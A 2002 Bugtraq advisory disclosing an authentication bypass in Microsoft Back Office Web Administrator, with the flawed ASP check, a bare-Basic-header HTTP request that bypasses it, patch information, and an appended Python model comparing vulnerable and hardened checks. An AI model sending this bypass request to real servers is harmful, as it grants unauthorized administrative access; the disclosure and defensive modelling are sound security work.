From nisr@ngssoftware.com Thu Apr 18 13:38:36 2002
From: NGSSoftware Insight Security Research
To: bugtraq@securityfocus.com
Date: Tue, 16 Apr 2002 15:08:47 +0100
Subject: Back Office Web Administrator Authentication Bypass (#NISR17042002A)

NGSSoftware Insight Security Research Advisory

Name: Back Office Web Administration Authentication Bypass
Systems Affected: Microsoft's Back Office Web Administrator 4.0, 4.5
Severity: Medium/High
Vendor URL: http://www.microsoft.com
Author: David Litchfield (david@ngssoftware.com)
Date: 17th April 2002
Advisory number: #NISR17042002A
Advisory URL: http://www.ngssoftware.com/advisories/boa.txt
Issue: Attackers can bypass the logon page and access the Back Office Web Administrator

Description
***********
With the Microsoft Back Office suite of products comes a web-based, ASP-based administration application that runs on IIS. Normally, to use the administration pages a user must authenticate, but NGSSoftware have discovered that it is trivial to bypass this.

Details
*******
Each of the Back Office Web Administrator ASP pages checks to see if the user has been authenticated, but does this with the following snippet of code:

    If Request.ServerVariables("auth_type") = "" Then
        Response.Status = "401 ACCESS DENIED"
        Response.End
    End If

This is the only "authorization/authentication" performed. As such it is trivial to bypass:

    GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1
    Host: hostname
    Authorization: Basic [enter]
    [enter]

No credentials are required: the AUTH_TYPE server variable is set as soon as an Authorization header naming a scheme is present, regardless of whether a user name or password have been supplied, so the check above passes. The page never confirms that an actual principal was logged on (for example via LOGON_USER), which is the test it should have made.

Risk and Mitigating Factors
***************************
By default the Back Office Web Administrator is limited to the loopback address (127.0.0.1), which means that it can't be accessed remotely. However, it is not uncommon to change this to allow for remote administration; tying the Administrator to the loopback address makes it somewhat useless. Basic authentication also needs to be enabled, which, again, is not uncommon.

Fix Information
***************
Those who match these criteria are strongly urged to obtain the patch from Microsoft. Please see http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316838& for more details.

A check for this issue has also been added to Typhon II, NGSSoftware's vulnerability assessment scanner. For more information about Typhon, please see the NGSSite @ http://www.ngssoftware.com/.
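The following is an added example, not code from the advisory or from Microsoft, that models the check described in the Details section. It derives AUTH_TYPE and LOGON_USER from a raw request the way the advisory says IIS does (AUTH_TYPE follows the scheme named in the Authorization header; LOGON_USER is only populated when supplied credentials validate, and IIS itself rejects credentials that do not), applies the page's original AUTH_TYPE-only test beside a hardened test that also requires a logged-on user, and builds the bare "Authorization: Basic" probe from the advisory. The credential store, host name and the helper names are assumptions made for the demonstration.

```python
"""Model of the Back Office Web Administrator authentication check and a hardened form."""
import base64
from typing import Dict, Optional

# Constructed credential store for the demonstration (not from the advisory).
VALID_USERS = {"admin": "s3cret"}
ADMIN_PATH = "/BOADMIN/BACKOFFICE/SERVICES.ASP"   # path used in the advisory's request


def build_request(host: str, path: str = ADMIN_PATH, credentials: Optional[str] = None) -> bytes:
    """Construct a raw GET request.

    credentials=None      -> no Authorization header (anonymous request)
    credentials=""        -> the advisory's bypass: 'Authorization: Basic' with nothing after it
    credentials="u:p"     -> ordinary Basic authentication
    """
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if credentials is not None:
        token = base64.b64encode(credentials.encode("latin-1")).decode("ascii")
        lines.append(("Authorization: Basic " + token).rstrip())
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_request(raw: bytes) -> Dict[str, str]:
    """Split a raw request into its request line and lower-cased header names."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    req = {"request_line": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            req[name.strip().lower()] = value.strip()
    return req


def server_variables(req: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Approximate the IIS server variables the ASP page sees.

    Assumption, as stated in the advisory: AUTH_TYPE is set from the scheme named in
    the Authorization header even when no credentials follow it.  LOGON_USER is set only
    when a supplied user:password pair validates; a pair that fails validation is rejected
    by IIS before the page runs, modelled here by returning None.
    """
    auth = req.get("authorization", "")
    scheme, _, token = auth.partition(" ")
    variables = {"AUTH_TYPE": scheme, "LOGON_USER": ""}
    if scheme.lower() == "basic" and token:
        try:
            decoded = base64.b64decode(token, validate=True).decode("latin-1")
        except (ValueError, UnicodeDecodeError):
            return None
        user, _, password = decoded.partition(":")
        if VALID_USERS.get(user) != password:
            return None
        variables["LOGON_USER"] = user
    return variables


def vulnerable_check(variables: Dict[str, str]) -> int:
    """The page's own test from the advisory: only AUTH_TYPE is consulted."""
    if variables["AUTH_TYPE"] == "":
        return 401
    return 200


def hardened_check(variables: Dict[str, str]) -> int:
    """Require an authenticated principal, not merely the presence of an Authorization header."""
    if variables["AUTH_TYPE"] == "" or variables["LOGON_USER"] == "":
        return 401
    return 200


def status_for(raw: bytes, page_check) -> int:
    """Status the client would receive for a raw request under a given page check."""
    variables = server_variables(parse_request(raw))
    if variables is None:          # IIS rejected the supplied credentials itself
        return 401
    return page_check(variables)


if __name__ == "__main__":
    for label, creds in (("anonymous", None), ("bare Basic header", ""), ("valid creds", "admin:s3cret")):
        raw = build_request("hostname", credentials=creds)
        print(f"{label:18} vulnerable={status_for(raw, vulnerable_check)} hardened={status_for(raw, hardened_check)}")
```

The bare header case is the one that matters: the original check returns 200 for it while the hardened check returns 401, and both checks agree on the anonymous and correctly-authenticated cases. The same probe request, sent to a host where the administrator has been rebound off loopback, is what a scanner check for this issue would send, with a 200 instead of a 401 indicating an unpatched system.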